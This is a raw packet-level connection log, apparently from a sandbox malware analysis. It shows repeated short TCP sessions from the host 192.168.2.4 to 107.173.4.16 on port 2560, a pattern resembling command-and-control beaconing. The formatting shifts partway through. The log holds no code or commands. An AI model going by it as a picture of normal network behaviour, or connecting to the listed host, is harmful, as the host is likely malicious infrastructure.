                                                                              Dec 16, 2024 17:32:16.191302061 CET256049894107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:17.855855942 CET256049894107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:17.857162952 CET498942560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:17.857223034 CET498942560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:17.982650042 CET256049894107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:18.835032940 CET498992560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:18.959693909 CET256049899107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:18.959795952 CET498992560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:19.605149984 CET498992560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:19.725222111 CET256049899107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:21.075392962 CET256049899107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:21.078161955 CET498992560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:21.078242064 CET498992560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:21.202891111 CET256049899107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:22.027854919 CET499062560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:22.147732019 CET256049906107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:22.147885084 CET499062560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:22.165659904 CET499062560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:22.286329031 CET256049906107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:24.131686926 CET256049906107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:24.131783962 CET499062560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:24.131918907 CET499062560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:24.252283096 CET256049906107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:25.289129019 CET499152560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:25.411087036 CET256049915107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:25.411181927 CET499152560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:25.417658091 CET499152560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:25.537873983 CET256049915107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:27.393239021 CET256049915107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:27.393382072 CET499152560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:27.393593073 CET499152560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:27.513310909 CET256049915107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:28.272789001 CET499222560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:28.396380901 CET256049922107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:28.396569014 CET499222560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:28.653983116 CET499222560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:28.773897886 CET256049922107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:30.366255045 CET256049922107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:30.366328001 CET499222560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:30.366429090 CET499222560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:30.486454010 CET256049922107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:31.225575924 CET499292560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:31.345499992 CET256049929107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:32:31.347946882 CET499292560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:31.557254076 CET499292560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:32:31.677337885 CET256049929107.173.4.16192.168.2.4
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Dec 16, 2024 17:32:33.297693014 CET  2560         49929      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:33.299388885 CET  49929        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:33.299474001 CET  49929        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:33.419286013 CET  2560         49929      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:34.116321087 CET  49938        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:34.236252069 CET  2560         49938      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:34.237972975 CET  49938        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:34.428986073 CET  49938        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:34.615298986 CET  2560         49938      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:36.168874025 CET  2560         49938      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:36.169189930 CET  49938        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:36.169189930 CET  49938        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:36.291203022 CET  2560         49938      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:36.960108042 CET  49945        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:37.080972910 CET  2560         49945      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:37.081881046 CET  49945        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:37.275670052 CET  49945        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:37.400882006 CET  2560         49945      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:39.032289028 CET  2560         49945      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:39.032418013 CET  49945        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:39.032522917 CET  49945        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:39.152278900 CET  2560         49945      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:39.803759098 CET  49951        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:39.923574924 CET  2560         49951      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:39.923696041 CET  49951        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:40.113465071 CET  49951        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:40.234368086 CET  2560         49951      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:41.859911919 CET  2560         49951      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:41.859982014 CET  49951        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:41.860059023 CET  49951        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:41.980045080 CET  2560         49951      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:42.600977898 CET  49959        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:42.725950003 CET  2560         49959      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:42.726808071 CET  49959        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:42.922075033 CET  49959        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:43.041950941 CET  2560         49959      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:44.685905933 CET  2560         49959      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:44.685977936 CET  49959        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:44.686039925 CET  49959        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:44.806108952 CET  2560         49959      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:45.413152933 CET  49968        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:45.533271074 CET  2560         49968      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:45.533421993 CET  49968        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:45.812045097 CET  49968        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:45.935205936 CET  2560         49968      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:47.466084957 CET  2560         49968      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:47.466166019 CET  49968        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:47.466370106 CET  49968        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:47.586198092 CET  2560         49968      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:48.163254976 CET  49974        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:48.284431934 CET  2560         49974      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:48.286720037 CET  49974        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:48.529737949 CET  49974        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:48.724205017 CET  2560         49974      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:50.263643026 CET  2560         49974      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:50.263797998 CET  49974        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:50.263823986 CET  49974        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:50.383608103 CET  2560         49974      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:50.944638968 CET  49980        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:51.066612005 CET  2560         49980      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:51.066729069 CET  49980        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:51.742608070 CET  49980        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:51.863267899 CET  2560         49980      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:53.027595043 CET  2560         49980      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:53.027683973 CET  49980        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:53.027741909 CET  49980        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:53.149048090 CET  2560         49980      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:53.678647041 CET  49987        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:53.798814058 CET  2560         49987      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:53.798957109 CET  49987        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:54.131903887 CET  49987        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:54.251959085 CET  2560         49987      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:55.731592894 CET  2560         49987      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:55.731755972 CET  49987        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:55.731825113 CET  49987        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:55.851649046 CET  2560         49987      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:56.366123915 CET  49993        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:56.486131907 CET  2560         49993      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:56.488035917 CET  49993        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:56.787306070 CET  49993        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:56.907304049 CET  2560         49993      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:58.435832024 CET  2560         49993      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:58.435920954 CET  49993        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:58.436058044 CET  49993        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:58.555989027 CET  2560         49993      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:59.038146973 CET  50003        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:59.159090996 CET  2560         50003      107.173.4.16  192.168.2.4
Dec 16, 2024 17:32:59.159195900 CET  50003        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:59.402591944 CET  50003        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:32:59.522452116 CET  2560         50003      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:01.110977888 CET  2560         50003      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:01.111052036 CET  50003        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:01.111119032 CET  50003        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:01.230962992 CET  2560         50003      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:01.694308043 CET  50009        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:01.815651894 CET  2560         50009      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:01.815990925 CET  50009        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:02.033212900 CET  50009        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:02.153228045 CET  2560         50009      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:03.754558086 CET  2560         50009      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:03.754622936 CET  50009        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:03.754805088 CET  50009        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:03.876118898 CET  2560         50009      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:04.319514036 CET  50015        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:04.439321995 CET  2560         50015      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:04.442106962 CET  50015        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:04.724910975 CET  50015        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:04.851361990 CET  2560         50015      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:06.391840935 CET  2560         50015      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:06.392060995 CET  50015        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:06.392159939 CET  50015        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:06.512023926 CET  2560         50015      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:06.944489002 CET  50022        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:07.064546108 CET  2560         50022      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:07.064666986 CET  50022        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:07.375910997 CET  50022        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:07.495676041 CET  2560         50022      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:09.001288891 CET  2560         50022      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:09.001422882 CET  50022        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:09.001491070 CET  50022        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:09.121402979 CET  2560         50022      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:09.538727045 CET  50028        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:09.660887957 CET  2560         50028      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:09.662139893 CET  50028        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:09.905067921 CET  50028        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:10.025096893 CET  2560         50028      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:11.626923084 CET  2560         50028      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:11.627019882 CET  50028        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:11.627085924 CET  50028        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:11.747287989 CET  2560         50028      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:12.147695065 CET  50038        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:12.267618895 CET  2560         50038      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:12.267752886 CET  50038        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:12.555908918 CET  50038        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:12.675726891 CET  2560         50038      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:14.205703020 CET  2560         50038      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:14.205806017 CET  50038        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:14.205897093 CET  50038        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:14.326134920 CET  2560         50038      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:14.710105896 CET  50044        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:14.830028057 CET  2560         50044      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:14.830251932 CET  50044        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:15.616122007 CET  50044        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:15.736007929 CET  2560         50044      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:16.784153938 CET  2560         50044      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:16.784251928 CET  50044        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:16.784358025 CET  50044        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:16.904376984 CET  2560         50044      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:17.272691011 CET  50049        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:17.392596006 CET  2560         50049      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:17.392746925 CET  50049        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:17.621727943 CET  50049        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:17.743210077 CET  2560         50049      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:19.329896927 CET  2560         50049      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:19.329977989 CET  50049        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:19.330085993 CET  50049        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:19.450464964 CET  2560         50049      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:19.847850084 CET  50055        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:19.971225023 CET  2560         50055      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:19.974456072 CET  50055        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:20.182674885 CET  50055        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:20.302618980 CET  2560         50055      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:21.924957991 CET  2560         50055      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:21.926481009 CET  50055        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:21.926575899 CET  50055        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:22.046442986 CET  2560         50055      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:22.382034063 CET  50059        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:22.502218962 CET  2560         50059      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:22.506088018 CET  50059        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:22.703326941 CET  50059        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:22.823216915 CET  2560         50059      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:24.470989943 CET  2560         50059      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:24.475070000 CET  50059        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:24.475311995 CET  50059        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:24.595760107 CET  2560         50059      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:24.971535921 CET  50060        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:25.091747999 CET  2560         50060      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:25.094027996 CET  50060        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:25.396944046 CET  50060        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:25.519004107 CET  2560         50060      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:27.048909903 CET  2560         50060      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:27.049050093 CET  50060        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:27.049144983 CET  50060        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:27.169250965 CET  2560         50060      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:27.475678921 CET  50061        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:27.595947027 CET  2560         50061      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:27.600079060 CET  50061        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:27.807471991 CET  50061        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:27.927783012 CET  2560         50061      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:29.548742056 CET  2560         50061      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:29.548832893 CET  50061        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:29.548922062 CET  50061        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:29.669183016 CET  2560         50061      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:29.960249901 CET  50062        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:30.080296993 CET  2560         50062      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:30.080404043 CET  50062        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:30.283121109 CET  50062        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:30.403151989 CET  2560         50062      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:32.017690897 CET  2560         50062      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:32.019962072 CET  50062        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:32.019963026 CET  50062        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:32.139942884 CET  2560         50062      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:32.413333893 CET  50063        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:32.533194065 CET  2560         50063      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:32.534214020 CET  50063        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:32.725119114 CET  50063        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:32.845110893 CET  2560         50063      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:34.466983080 CET  2560         50063      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:34.467071056 CET  50063        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:34.467137098 CET  50063        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:34.587217093 CET  2560         50063      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:34.897727966 CET  50064        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:35.017796993 CET  2560         50064      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:35.018878937 CET  50064        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:35.279050112 CET  50064        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:35.399085045 CET  2560         50064      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:36.967065096 CET  2560         50064      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:36.968097925 CET  50064        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:36.968199968 CET  50064        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:37.088157892 CET  2560         50064      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:37.345701933 CET  50065        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:37.465578079 CET  2560         50065      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:37.468046904 CET  50065        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:37.710551023 CET  50065        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:37.830738068 CET  2560         50065      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:39.405567884 CET  2560         50065      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:39.408041954 CET  50065        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:39.408111095 CET  50065        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:39.528264999 CET  2560         50065      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:39.775856972 CET  50066        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:39.896806002 CET  2560         50066      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:39.898191929 CET  50066        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:40.105117083 CET  50066        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:40.225374937 CET  2560         50066      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:41.842327118 CET  2560         50066      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:41.846513033 CET  50066        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:41.846594095 CET  50066        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:41.966598988 CET  2560         50066      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:42.194406033 CET  50067        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:42.314538956 CET  2560         50067      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:42.318429947 CET  50067        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:42.550971031 CET  50067        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:42.671120882 CET  2560         50067      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:44.248337030 CET  2560         50067      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:44.250391006 CET  50067        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:44.250391006 CET  50067        2560       192.168.2.4   107.173.4.16
Dec 16, 2024 17:33:44.370431900 CET  2560         50067      107.173.4.16  192.168.2.4
Dec 16, 2024 17:33:44.605273962 CET  50068        2560       192.168.2.4   107.173.4.16
                                                                              Dec 16, 2024 17:33:44.725163937 CET256050068107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:44.725755930 CET500682560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:44.944195032 CET500682560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:45.065967083 CET256050068107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:46.674446106 CET256050068107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:46.675081968 CET500682560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:46.675081968 CET500682560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:46.795332909 CET256050068107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:47.006922960 CET500692560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:47.126791000 CET256050069107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:47.130249023 CET500692560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:47.367614031 CET500692560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:47.487629890 CET256050069107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:49.061661005 CET256050069107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:49.064097881 CET500692560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:49.064172029 CET500692560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:49.183939934 CET256050069107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:49.407125950 CET500702560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:49.528532028 CET256050070107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:49.528654099 CET500702560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:49.746546030 CET500702560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:49.867263079 CET256050070107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:51.486603975 CET256050070107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:51.488115072 CET500702560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:51.488184929 CET500702560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:51.607965946 CET256050070107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:51.890505075 CET500712560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:52.010776997 CET256050071107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:52.010885000 CET500712560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:52.258084059 CET500712560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:52.379559994 CET256050071107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:53.958439112 CET256050071107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:53.962240934 CET500712560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:53.962321997 CET500712560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:54.082436085 CET256050071107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:54.295347929 CET500722560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:54.415344000 CET256050072107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:54.418391943 CET500722560192.168.2.4107.173.4.16
